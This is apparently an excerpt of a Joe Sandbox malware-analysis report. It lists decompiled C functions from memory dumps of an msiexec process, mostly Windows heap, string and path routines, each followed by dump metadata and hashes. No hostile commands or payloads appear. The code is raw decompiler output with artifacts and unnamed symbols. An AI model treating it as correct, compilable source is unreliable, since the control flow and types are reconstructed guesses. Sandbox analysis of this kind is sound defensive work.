                              			E04D05210(intOrPtr _a4, void* _a8) {
                              				void* __ecx;
                              				intOrPtr _t31;
                              				signed int _t32;
                              				signed int _t33;
                              				intOrPtr _t35;
                              				signed int _t52;
                              				void* _t54;
                              				void* _t56;
                              				unsigned int _t59;
                              				signed int _t60;
                              				void* _t61;
                              
                              				_t61 = E04D052A5(1);
                              				if(_t61 == 0) {
                              					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                              					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                              					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                              				} else {
                              					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                              					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                              				}
                              				_t60 = _t59 >> 1;
                              				_t32 = 0x3a;
                              				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                              					_t52 = _t60 + _t60;
                              					if(_a4 > _t52) {
                              						goto L5;
                              					}
                              					if(_t61 != 0) {
                              						asm("lock xadd [esi], eax");
                              						if((_t32 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(_t61 + 4)));
                              							E04D495D0();
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              						}
                              					} else {
                              						E04D1EB70(_t54, 0x4df79a0);
                              					}
                              					_t26 = _t52 + 2; // 0xddeeddf0
                              					return _t26;
                              				} else {
                              					_t52 = _t60 + _t60;
                              					if(_a4 < _t52) {
                              						if(_t61 != 0) {
                              							asm("lock xadd [esi], eax");
                              							if((_t32 | 0xffffffff) == 0) {
                              								_push( *((intOrPtr*)(_t61 + 4)));
                              								E04D495D0();
                              								L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              							}
                              						} else {
                              							E04D1EB70(_t54, 0x4df79a0);
                              						}
                              						return _t52;
                              					}
                              					L5:
                              					_t33 = E04D4F3E0(_a8, _t54, _t52);
                              					if(_t61 == 0) {
                              						E04D1EB70(_t54, 0x4df79a0);
                              					} else {
                              						asm("lock xadd [esi], eax");
                              						if((_t33 | 0xffffffff) == 0) {
                              							_push( *((intOrPtr*)(_t61 + 4)));
                              							E04D495D0();
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                              						}
                              					}
                              					_t35 = _a8;
                              					if(_t60 <= 1) {
                              						L9:
                              						_t60 = _t60 - 1;
                              						 *((short*)(_t52 + _t35 - 2)) = 0;
                              						goto L10;
                              					} else {
                              						_t56 = 0x3a;
                              						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                              							 *((short*)(_t52 + _t35)) = 0;
                              							L10:
                              							return _t60 + _t60;
                              						}
                              						goto L9;
                              					}
                              				}
                              			}















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: e28fc6e5be73bc098899ee5a49dcedd68d3622387949b3c2b2cda2cecaaefe27
                              • Instruction ID: 0ed1830e82649e30fdf6f6d8cadf82e912a30bc6fde47cb175c70cc365101721
                              • Opcode Fuzzy Hash: e28fc6e5be73bc098899ee5a49dcedd68d3622387949b3c2b2cda2cecaaefe27
                              • Instruction Fuzzy Hash: 6C31E131741611EBD732DF28D990F6677A5FF50764F118B1AE85A0B9E0EB60F800CEA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 100%
                              			E04D43D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                              				intOrPtr _v8;
                              				char _v12;
                              				signed short** _t33;
                              				short* _t38;
                              				intOrPtr* _t39;
                              				intOrPtr* _t41;
                              				signed short _t43;
                              				intOrPtr* _t47;
                              				intOrPtr* _t53;
                              				signed short _t57;
                              				intOrPtr _t58;
                              				signed short _t60;
                              				signed short* _t61;
                              
                              				_t47 = __ecx;
                              				_t61 = __edx;
                              				_t60 = ( *__ecx & 0x0000ffff) + 2;
                              				if(_t60 > 0xfffe) {
                              					L22:
                              					return 0xc0000106;
                              				}
                              				if(__edx != 0) {
                              					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                              						L5:
                              						E04D17B60(0, _t61, 0x4ce11c4);
                              						_v12 =  *_t47;
                              						_v12 = _v12 + 0xfff8;
                              						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                              						E04D17B60(0xfff8, _t61,  &_v12);
                              						_t33 = _a8;
                              						if(_t33 != 0) {
                              							 *_t33 = _t61;
                              						}
                              						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                              						_t53 = _a12;
                              						if(_t53 != 0) {
                              							_t57 = _t61[2];
                              							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                              							while(_t38 >= _t57) {
                              								if( *_t38 == 0x5c) {
                              									_t41 = _t38 + 2;
                              									if(_t41 == 0) {
                              										break;
                              									}
                              									_t58 = 0;
                              									if( *_t41 == 0) {
                              										L19:
                              										 *_t53 = _t58;
                              										goto L7;
                              									}
                              									 *_t53 = _t41;
                              									goto L7;
                              								}
                              								_t38 = _t38 - 2;
                              							}
                              							_t58 = 0;
                              							goto L19;
                              						} else {
                              							L7:
                              							_t39 = _a16;
                              							if(_t39 != 0) {
                              								 *_t39 = 0;
                              								 *((intOrPtr*)(_t39 + 4)) = 0;
                              								 *((intOrPtr*)(_t39 + 8)) = 0;
                              								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                              							}
                              							return 0;
                              						}
                              					}
                              					_t61 = _a4;
                              					if(_t61 != 0) {
                              						L3:
                              						_t43 = L04D24620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                              						_t61[2] = _t43;
                              						if(_t43 == 0) {
                              							return 0xc0000017;
                              						}
                              						_t61[1] = _t60;
                              						 *_t61 = 0;
                              						goto L5;
                              					}
                              					goto L22;
                              				}
                              				_t61 = _a4;
                              				if(_t61 == 0) {
                              					return 0xc000000d;
                              				}
                              				goto L3;
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
                              • Instruction ID: 8469705940ddaea7660a220ff5b5ea5402839c9ccbb16b13efcf48992a8f2caa
                              • Opcode Fuzzy Hash: 26c512d925090f7cae913652692b5036cd54b2175c3276bc3f2ebbac89a801f6
                              • Instruction Fuzzy Hash: F8317A31B05625DBD7288F2ED841A6ABBF5FF95710B05806AE889CB260F730E940DB90
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 78%
                              			E04D3A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                              				intOrPtr _t35;
                              				intOrPtr _t39;
                              				intOrPtr _t45;
                              				intOrPtr* _t51;
                              				intOrPtr* _t52;
                              				intOrPtr* _t55;
                              				signed int _t57;
                              				intOrPtr* _t59;
                              				intOrPtr _t68;
                              				intOrPtr* _t77;
                              				void* _t79;
                              				signed int _t80;
                              				intOrPtr _t81;
                              				char* _t82;
                              				void* _t83;
                              
                              				_push(0x24);
                              				_push(0x4de0220);
                              				E04D5D08C(__ebx, __edi, __esi);
                              				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                              				_t79 = __ecx;
                              				_t35 =  *0x4df7b9c; // 0x0
                              				_t55 = L04D24620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                              				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                              				if(_t55 == 0) {
                              					_t39 = 0xc0000017;
                              					L11:
                              					return E04D5D0D1(_t39);
                              				}
                              				_t68 = 0;
                              				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                              				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                              				_t7 = _t55 + 8; // 0x8
                              				_t57 = 6;
                              				memcpy(_t7, _t79, _t57 << 2);
                              				_t80 = 0xfffffffe;
                              				 *(_t83 - 4) = _t80;
                              				if(0 < 0) {
                              					L14:
                              					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                              					L20:
                              					L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                              					_t39 = _t81;
                              					goto L11;
                              				}
                              				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                              					_t81 = 0xc000007b;
                              					goto L20;
                              				}
                              				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                              					_t59 =  *((intOrPtr*)(_t83 + 8));
                              					_t45 =  *_t59;
                              					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                              					 *_t59 = _t45 + 1;
                              					L6:
                              					 *(_t83 - 4) = 1;
                              					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                              					 *(_t83 - 4) = _t80;
                              					if(_t68 < 0) {
                              						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                              						if(_t82 == 0) {
                              							goto L14;
                              						}
                              						asm("btr eax, ecx");
                              						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                              						if( *_t82 != 0) {
                              							 *0x4df7b10 =  *0x4df7b10 - 8;
                              						}
                              						goto L20;
                              					}
                              					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                              					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                              					_t51 =  *0x4df536c; // 0x3065e80
                              					if( *_t51 != 0x4df5368) {
                              						_push(3);
                              						asm("int 0x29");
                              						goto L14;
                              					}
                              					 *_t55 = 0x4df5368;
                              					 *((intOrPtr*)(_t55 + 4)) = _t51;
                              					 *_t51 = _t55;
                              					 *0x4df536c = _t55;
                              					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                              					if(_t52 != 0) {
                              						 *_t52 = _t55;
                              					}
                              					_t39 = 0;
                              					goto L11;
                              				}
                              				_t77 =  *((intOrPtr*)(_t83 + 8));
                              				_t68 = E04D3A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                              				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                              				if(_t68 < 0) {
                              					goto L14;
                              				}
                              				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                              				goto L6;
                              			}



















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b6611954738ff7e77f524d8a04d0fe65d15debddc540868cee2d4c674f1ffefb
                              • Instruction ID: 8b84d783fe6847dd26803b2586dc90d0d7ed839a2d6e48b96f8d865a93d94589
                              • Opcode Fuzzy Hash: b6611954738ff7e77f524d8a04d0fe65d15debddc540868cee2d4c674f1ffefb
                              • Instruction Fuzzy Hash: D64147B5B00215DFDB25CF58D9A0B99BBF1FB49305F1980A9E844AB345D778BD01CBA0
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 76%
                              			E04D87016(short __ecx, intOrPtr __edx, char _a4, char _a8, signed short* _a12, signed short* _a16) {
                              				signed int _v8;
                              				char _v588;
                              				intOrPtr _v592;
                              				intOrPtr _v596;
                              				signed short* _v600;
                              				char _v604;
                              				short _v606;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				signed short* _t55;
                              				void* _t56;
                              				signed short* _t58;
                              				signed char* _t61;
                              				char* _t68;
                              				void* _t69;
                              				void* _t71;
                              				void* _t72;
                              				signed int _t75;
                              
                              				_t64 = __edx;
                              				_t77 = (_t75 & 0xfffffff8) - 0x25c;
                              				_v8 =  *0x4dfd360 ^ (_t75 & 0xfffffff8) - 0x0000025c;
                              				_t55 = _a16;
                              				_v606 = __ecx;
                              				_t71 = 0;
                              				_t58 = _a12;
                              				_v596 = __edx;
                              				_v600 = _t58;
                              				_t68 =  &_v588;
                              				if(_t58 != 0) {
                              					_t71 = ( *_t58 & 0x0000ffff) + 2;
                              					if(_t55 != 0) {
                              						_t71 = _t71 + ( *_t55 & 0x0000ffff) + 2;
                              					}
                              				}
                              				_t8 = _t71 + 0x2a; // 0x28
                              				_t33 = _t8;
                              				_v592 = _t8;
                              				if(_t71 <= 0x214) {
                              					L6:
                              					 *((short*)(_t68 + 6)) = _v606;
                              					if(_t64 != 0xffffffff) {
                              						asm("cdq");
                              						 *((intOrPtr*)(_t68 + 0x20)) = _t64;
                              						 *((char*)(_t68 + 0x28)) = _a4;
                              						 *((intOrPtr*)(_t68 + 0x24)) = _t64;
                              						 *((char*)(_t68 + 0x29)) = _a8;
                              						if(_t71 != 0) {
                              							_t22 = _t68 + 0x2a; // 0x2a
                              							_t64 = _t22;
                              							E04D86B4C(_t58, _t22, _t71,  &_v604);
                              							if(_t55 != 0) {
                              								_t25 = _v604 + 0x2a; // 0x2a
                              								_t64 = _t25 + _t68;
                              								E04D86B4C(_t55, _t25 + _t68, _t71 - _v604,  &_v604);
                              							}
                              							if(E04D27D50() == 0) {
                              								_t61 = 0x7ffe0384;
                              							} else {
                              								_t61 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                              							}
                              							_push(_t68);
                              							_push(_v592 + 0xffffffe0);
                              							_push(0x402);
                              							_push( *_t61 & 0x000000ff);
                              							E04D49AE0();
                              						}
                              					}
                              					_t35 =  &_v588;
                              					if( &_v588 != _t68) {
                              						_t35 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t68);
                              					}
                              					L16:
                              					_pop(_t69);
                              					_pop(_t72);
                              					_pop(_t56);
                              					return E04D4B640(_t35, _t56, _v8 ^ _t77, _t64, _t69, _t72);
                              				}
                              				_t68 = L04D24620(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t33);
                              				if(_t68 == 0) {
                              					goto L16;
                              				} else {
                              					_t58 = _v600;
                              					_t64 = _v596;
                              					goto L6;
                              				}
                              			}























                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
                              • Instruction ID: 90e677e94a275b6ff492a520c291cd34a334b1e143bec1fe5dc89521eff2cdde
                              • Opcode Fuzzy Hash: bb542eb4fb5bd1c45464d51b32100dbe1e71e72a491d5c877f0736edcf07ca63
                              • Instruction Fuzzy Hash: B1317E726047519BC320EF68CD41A7AB7E9FF88704F144A2DF8959B690E734F904CBA6
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 68%
                              			E04D2C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                              				signed int* _v8;
                              				char _v16;
                              				void* __ebx;
                              				void* __edi;
                              				signed char _t33;
                              				signed char _t43;
                              				signed char _t48;
                              				signed char _t62;
                              				void* _t63;
                              				intOrPtr _t69;
                              				intOrPtr _t71;
                              				unsigned int* _t82;
                              				void* _t83;
                              
                              				_t80 = __ecx;
                              				_t82 = __edx;
                              				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                              				_t62 = _t33 >> 0x00000001 & 0x00000001;
                              				if((_t33 & 0x00000001) != 0) {
                              					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                              					if(E04D27D50() != 0) {
                              						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                              					} else {
                              						_t43 = 0x7ffe0386;
                              					}
                              					if( *_t43 != 0) {
                              						_t43 = E04DD8D34(_v8, _t80);
                              					}
                              					E04D22280(_t43, _t82);
                              					if( *((char*)(_t80 + 0xdc)) == 0) {
                              						E04D1FFB0(_t62, _t80, _t82);
                              						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                              						_t30 = _t80 + 0xd0; // 0xd0
                              						_t83 = _t30;
                              						E04DD8833(_t83,  &_v16);
                              						_t81 = _t80 + 0x90;
                              						E04D1FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                              						_t63 = 0;
                              						_push(0);
                              						_push(_t83);
                              						_t48 = E04D4B180();
                              						if(_a4 != 0) {
                              							E04D22280(_t48, _t81);
                              						}
                              					} else {
                              						_t69 = _v8;
                              						_t12 = _t80 + 0x98; // 0x98
                              						_t13 = _t69 + 0xc; // 0x575651ff
                              						E04D2BB2D(_t13, _t12);
                              						_t71 = _v8;
                              						_t15 = _t80 + 0xb0; // 0xb0
                              						_t16 = _t71 + 8; // 0x8b000cc2
                              						E04D2BB2D(_t16, _t15);
                              						E04D2B944(_v8, _t62);
                              						 *((char*)(_t80 + 0xdc)) = 0;
                              						E04D1FFB0(0, _t80, _t82);
                              						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                              						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                              						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                              						 *(_t80 + 0xde) = 0;
                              						if(_a4 == 0) {
                              							_t25 = _t80 + 0x90; // 0x90
                              							E04D1FFB0(0, _t80, _t25);
                              						}
                              						_t63 = 1;
                              					}
                              					return _t63;
                              				}
                              				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                              				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                              				if(_a4 == 0) {
                              					_t24 = _t80 + 0x90; // 0x90
                              					E04D1FFB0(0, __ecx, _t24);
                              				}
                              				return 0;
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction ID: 3292ed72b37295239a81527db604da713f9063a9f9e589b7dafcf418baf5cd13
                              • Opcode Fuzzy Hash: b4a3881b78bd852e90f123f8f308f7d6cb7f2242736900428c2759f2d7e2a9ea
                              • Instruction Fuzzy Hash: C5312171B01596BAE705EBB0C580BEDF7A4FF6220CF08815AD51C97201EB74BA09DBB1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 92%
                              			E04D3A70E(intOrPtr* __ecx, char* __edx) {
                              				unsigned int _v8;
                              				intOrPtr* _v12;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				void* _t16;
                              				intOrPtr _t17;
                              				intOrPtr _t28;
                              				char* _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t38;
                              				void* _t50;
                              				intOrPtr _t52;
                              
                              				_push(__ecx);
                              				_push(__ecx);
                              				_t52 =  *0x4df7b10; // 0x10
                              				_t33 = __edx;
                              				_t48 = __ecx;
                              				_v12 = __ecx;
                              				if(_t52 == 0) {
                              					 *0x4df7b10 = 8;
                              					 *0x4df7b14 = 0x4df7b0c;
                              					 *0x4df7b18 = 1;
                              					L6:
                              					_t2 = _t52 + 1; // 0x11
                              					E04D3A990(0x4df7b10, _t2, 7);
                              					asm("bts ecx, eax");
                              					 *_t48 = _t52;
                              					 *_t33 = 1;
                              					L3:
                              					_t16 = 0;
                              					L4:
                              					return _t16;
                              				}
                              				_t17 = L04D3A840(__edx, __ecx, __ecx, _t52, 0x4df7b10, 1, 0);
                              				if(_t17 == 0xffffffff) {
                              					_t37 =  *0x4df7b10; // 0x10
                              					_t3 = _t37 + 0x27; // 0x37
                              					__eflags = _t3 >> 5 -  *0x4df7b18; // 0x1
                              					if(__eflags > 0) {
                              						_t38 =  *0x4df7b9c; // 0x0
                              						_t4 = _t52 + 0x27; // 0x37
                              						_v8 = _t4 >> 5;
                              						_t50 = L04D24620(_t38 + 0xc0000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t38 + 0xc0000, _t4 >> 5 << 2);
                              						__eflags = _t50;
                              						if(_t50 == 0) {
                              							_t16 = 0xc0000017;
                              							goto L4;
                              						}
                              						 *0x4df7b18 = _v8;
                              						_t8 = _t52 + 7; // 0x17
                              						E04D4F3E0(_t50,  *0x4df7b14, _t8 >> 3);
                              						_t28 =  *0x4df7b14; // 0x771c7b0c
                              						__eflags = _t28 - 0x4df7b0c;
                              						if(_t28 != 0x4df7b0c) {
                              							L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
                              						}
                              						_t9 = _t52 + 8; // 0x18
                              						 *0x4df7b14 = _t50;
                              						_t48 = _v12;
                              						 *0x4df7b10 = _t9;
                              						goto L6;
                              					}
                              					 *0x4df7b10 = _t37 + 8;
                              					goto L6;
                              				}
                              				 *__ecx = _t17;
                              				 *_t33 = 0;
                              				goto L3;
                              			}

















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: fc73d836e8ebcda197616087bbf2e5e995a3897ddd22436936ae9d48838f6573
                              • Instruction ID: 8b402100ccaeb61d7fe2320634b093f8af66f042e0a31c4ea869e13db49de739
                              • Opcode Fuzzy Hash: fc73d836e8ebcda197616087bbf2e5e995a3897ddd22436936ae9d48838f6573
                              • Instruction Fuzzy Hash: C031ADB1720201ABD721CF18D8A0FA977F9FB86714F15096AE18597340E7B8BD01CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 97%
                              			E04D361A0(signed int* __ecx) {
                              				intOrPtr _v8;
                              				char _v12;
                              				intOrPtr* _v16;
                              				intOrPtr _v20;
                              				intOrPtr _t30;
                              				intOrPtr _t31;
                              				void* _t32;
                              				intOrPtr _t33;
                              				intOrPtr _t37;
                              				intOrPtr _t49;
                              				signed int _t51;
                              				intOrPtr _t52;
                              				signed int _t54;
                              				void* _t59;
                              				signed int* _t61;
                              				intOrPtr* _t64;
                              
                              				_t61 = __ecx;
                              				_v12 = 0;
                              				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                              				_v16 = __ecx;
                              				_v8 = 0;
                              				if(_t30 == 0) {
                              					L6:
                              					_t31 = 0;
                              					L7:
                              					return _t31;
                              				}
                              				_t32 = _t30 + 0x5d8;
                              				if(_t32 == 0) {
                              					goto L6;
                              				}
                              				_t59 = _t32 + 0x30;
                              				if( *((intOrPtr*)(_t32 + 0x30)) == 0) {
                              					goto L6;
                              				}
                              				if(__ecx != 0) {
                              					 *((intOrPtr*)(__ecx)) = 0;
                              					 *((intOrPtr*)(__ecx + 4)) = 0;
                              				}
                              				if( *((intOrPtr*)(_t32 + 0xc)) != 0) {
                              					_t51 =  *(_t32 + 0x10);
                              					_t33 = _t32 + 0x10;
                              					_v20 = _t33;
                              					_t54 =  *(_t33 + 4);
                              					if((_t51 | _t54) == 0) {
                              						_t37 = E04D35E50(0x4ce67cc, 0, 0,  &_v12);
                              						if(_t37 != 0) {
                              							goto L6;
                              						}
                              						_t52 = _v8;
                              						asm("lock cmpxchg8b [esi]");
                              						_t64 = _v16;
                              						_t49 = _t37;
                              						_v20 = 0;
                              						if(_t37 == 0) {
                              							if(_t64 != 0) {
                              								 *_t64 = _v12;
                              								 *((intOrPtr*)(_t64 + 4)) = _t52;
                              							}
                              							E04DD9D2E(_t59, 0, _v12, _v8,  *( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38) & 0x0000ffff,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x3c)));
                              							_t31 = 1;
                              							goto L7;
                              						}
                              						E04D0F7C0(_t52, _v12, _t52, 0);
                              						if(_t64 != 0) {
                              							 *_t64 = _t49;
                              							 *((intOrPtr*)(_t64 + 4)) = _v20;
                              						}
                              						L12:
                              						_t31 = 1;
                              						goto L7;
                              					}
                              					if(_t61 != 0) {
                              						 *_t61 = _t51;
                              						_t61[1] = _t54;
                              					}
                              					goto L12;
                              				} else {
                              					goto L6;
                              				}
                              			}




















                              Memory Dump Source
                              • Source File: 0000000B.00000002.941198488.0000000004CE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04CE0000, based on PE: true
                              • Associated: 0000000B.00000002.941382853.0000000004DFB000.00000040.00000800.00020000.00000000.sdmp
                              • Associated: 0000000B.00000002.941394667.0000000004DFF000.00000040.00000800.00020000.00000000.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_11_2_4ce0000_msiexec.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: a7662b0f5c916c21c1e01ecd52a639d826d18cf3d5496b219cb1c0f6b7ae5ab9
                              • Instruction ID: 6fd63f3a1201fd282bad0aa5de962cbbbb98ad83daf7d638b1baeed6c2c58262
                              • Opcode Fuzzy Hash: a7662b0f5c916c21c1e01ecd52a639d826d18cf3d5496b219cb1c0f6b7ae5ab9
                              • Instruction Fuzzy Hash: 6B318B726093019FD360DF19C840B2AB7E5FB88B04F05496DE9989B361E7B0F804CBA1
                              Uniqueness

                              Uniqueness Score: -1.00%

                              C-Code - Quality: 95%
                              			E04D0AA16(signed short* __ecx) {
                              				signed int _v8;
                              				intOrPtr _v12;
                              				signed short _v16;
                              				intOrPtr _v20;
                              				signed short _v24;
                              				signed short _v28;
                              				void* _v32;
                              				void* __ebx;
                              				void* __edi;
                              				void* __esi;
                              				intOrPtr _t25;
                              				signed short _t38;
                              				signed short* _t42;
                              				signed int _t44;
                              				signed short* _t52;
                              				signed short _t53;
                              				signed int _t54;
                              
                              				_v8 =  *0x4dfd360 ^ _t54;
                              				_t42 = __ecx;
                              				_t44 =  *__ecx & 0x0000ffff;
                              				_t52 =  &(__ecx[2]);
                              				_t51 = _t44 + 2;
                              				if(_t44 + 2 > (__ecx[1] & 0x0000ffff)) {
                              					L4:
                              					_t25 =  *0x4df7b9c; // 0x0
                              					_t53 = L04D24620(_t44,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t25 + 0x180000, _t51);
                              					__eflags = _t53;
                              					if(_t53 == 0) {
                              						L3:
                              						return E04D4B640(_t28, _t42, _v8 ^ _t54, _t51, _t52, _t53);
                              					} else {
                              						E04D4F3E0(_t53,  *_t52,  *_t42 & 0x0000ffff);
                              						 *((short*)(_t53 + (( *_t42 & 0x0000ffff) >> 1) * 2)) = 0;
                              						L2:
                              						_t51 = 4;
                              						if(L04D16C59(_t53, _t51, _t58) != 0) {
                              							_t28 = E04D35E50(0x4cec338, 0, 0,  &_v32);
                              							__eflags = _t28;
                              							if(_t28 == 0) {
                              								_t38 = ( *_t42 & 0x0000ffff) + 2;
                              								__eflags = _t38;
                              								_v24 = _t53;
                              								_v16 = _t38;
                              								_v20 = 0;
                              								_v12 = 0;
                              								E04D3B230(_v32, _v28, 0x4cec2d8, 1,  &_v24);
                              								_t28 = E04D0F7A0(_v32, _v28);
                              							}
                              							__eflags = _t53 -  *_t52;
                              							if(_t53 !=  *_t52) {
                              								_t28 = L04D277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                              							}
                              						}
                              						goto L3;
                              					}
                              				}
                              				_t53 =  *_t52;
                              				_t44 = _t44 >> 1;
                              				_t58 =  *((intOrPtr*)(_t53 + _t44 * 2));
                              				if( *((intOrPtr*)(_t53 + _t44 * 2)) != 0) {
                              					goto L4;
                              				}
                              				goto L2;
                              			}

                              Memory Dump Source
